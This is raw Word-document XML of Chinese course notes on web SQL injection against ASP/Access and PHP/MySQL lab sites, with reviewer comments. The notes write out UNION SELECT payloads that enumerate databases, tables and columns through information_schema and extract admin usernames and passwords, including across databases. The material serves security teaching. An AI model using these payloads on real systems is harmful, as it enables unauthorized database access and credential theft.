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WEB攻防-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>通用漏洞&amp;SQL注入&amp;MYSQL跨库&amp;ACCESS偏移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4119768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768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1、脚本代码与数据库前置知识</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、Access数据库注入-简易&amp;偏移</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、MYSQL数据库注入-简易&amp;权限跨库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#前置知识：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-SQL注入漏洞产生原理分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-SQL注入漏洞危害利用分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-脚本代码与数据库操作流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-数据库名，表名，列名，数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-数据库类型，数据库用户，用户权限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ASP+Access-简易注入-字典猜解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ASP+Access-偏移注入-报错显示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PHP+MYSQL-简易注入-存储特性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PHP+MYSQL-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跨库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注入-权限属性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">脚本代码在实现代码与数据库进行数据通讯时（从数据库取出相关数据进行页面显示），将定义的SQL语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句，从而执行恶意的SQL语句，可以实现查询其他数据（数据库中的敏感数据，如管理员帐号密码）。这一个过程就可以叫做SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">漏洞产生根本条件：可控变量 特定函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://192.168.46.160:85/Production/PRODUCT.</w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">asp</w:t>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r>
        <w:commentReference w:id="0"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://192.168.46.160:85/Production/PRODUCT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.asp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?id=1513</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">如果下面的URL地址测试注入判断id有注入，手工测试该如何进行？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://192.168.46.160:85/Production/PRODUCT.asp?id=1513</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;page=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">http://192.168.46.160:85/Production/PRODUCT.asp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">page=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id=1513</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Production/PRODUCT.asp?id=1513</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">注入语句&amp;page=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 对</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Production/PRODUCT.asp?id=1513&amp;page=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 注入语句 错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">SQL注入攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1、猜测数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、根据类型选择思路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ACCESS 独立存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">数据库名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">列名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">MYSQL 统一管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">最高数据库用户=root用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">数据库A=网站A=数据库用户A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">列名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">数据库B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=网站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=数据库用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">B</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">数据库C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=网站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=数据库用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">为了网站和数据库的安全性，MYSQL内置有ROOT最高用户，划分等级，每个用户对应管理一个数据库，这样保证无不关联，从而不会影响到其他数据库的运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">MYSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">两种思路：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">非ROOT的注入攻击：常规类的猜解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ROOT用户的注入攻击：文件读写操作，跨库查询注入等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">黑盒测试中可以采用user()获取当前用户权限，白盒中看连接用户即可！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">select * from product wh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ere id=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1513 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">select * from product where id=1513 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">查询admin表名：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">查询admin表名下的admin等列名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION select 1,2,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">MYSQL5.0以上版本：自带的数据库名information_schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">information_schema：存储数据库下的数据库名及表名，列名信息的数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">：记录表名信息的表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">information_schema.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">：记录列名信息表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取相关数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1、数据库版本-看是否符合information_schema查询-version()-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5.5.532</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2、数据库用户-看是否符合ROOT型注入攻击-user()-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3、当前操作系统-看是否支持大小写或文件路径选择-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">@@version_compile_os</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-win</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4、数据库名字-为后期猜解指定数据库下的表，列做准备-database()-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">syguestbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ROOT类型攻击-猜解数据，文件读写，跨库查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">syguestbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">数据库下面的表名信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT </w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r>
        <w:t xml:space="preserve">table_name</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema</w:t>
      </w:r>
      <w:commentRangeStart w:id="2"/>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r>
        <w:commentReference w:id="2"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tables where table_schema='syguestbook'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取表名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sy_adminuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">的列名信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='sy_adminuser' and table_schema='syguestbook'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取指定数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from sy_adminuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">跨库注入：实现当前网站跨库查询其他数据库对应网站的数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取当前mysql下的所有数据库名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">schema_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">information_schema.schemata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取数据库名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xhcms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">下的表名信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='xhcms'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取数据库名xhcms下的表manage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">下的列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">信息</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='manage' and table_schema='xhcms'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">获取指定数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">UNION SELECT </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xhcms.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">manage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ASP+Access-简易注入-字典猜解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">由于Access数据库特性导致这个SQL注入是需要借助字典去猜解表名和列名的，那么就会出现表名或列名猜解不到，可以自定义社工字典或采用偏移注入！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ASP+Access</w:t>
      </w:r>
      <w:commentRangeStart w:id="3"/>
      <w:r>
        <w:t xml:space="preserve">-偏移注入</w:t>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r>
        <w:commentReference w:id="3"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-报错显示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">偏移注入就是解决表名已知，列名未知的情况！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PHP+MYSQL-简易注入-存储特性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PHP+MYSQL-跨库注入-权限属性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年蚀" w:date="2022-02-11T10:57:08Z" w:id="0">
    <w:p w14:paraId="3f5c2a5a" w14:textId="3ae84397">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>不能说明没用注入，他参数请求可能在其他地方显示</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="年蚀" w:date="2022-02-14T14:31:18Z" w:id="1">
    <w:p w14:paraId="32726433" w14:textId="337033be">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>如果不显示全部，则改为group_concat(table_name)即可</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="年蚀" w:date="2022-02-14T14:24:40Z" w:id="2">
    <w:p w14:paraId="3421dd13" w14:textId="36ddf4f2">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>代表下一级</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="t" w:author="方." w:date="2022-05-07T14:53:18Z" w:id="3">
    <w:p w14:paraId="32ef9c7f" w14:textId="3e249d74">
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:color w:val="7E7E7E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>用*去查询能代表几（在视频演示中代表6），然后百度偏移注入语句（要修改语句中的表名，是你自己已知的表名），即可随机爆出数据。</w:t>
      </w:r>
    </w:p>
  </w:comment>
</w:comments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f5c2a5a" w15:done="0"/>
  <w15:commentEx w15:paraId="32726433" w15:done="0"/>
  <w15:commentEx w15:paraId="3421dd13" w15:done="0"/>
  <w15:commentEx w15:paraId="32ef9c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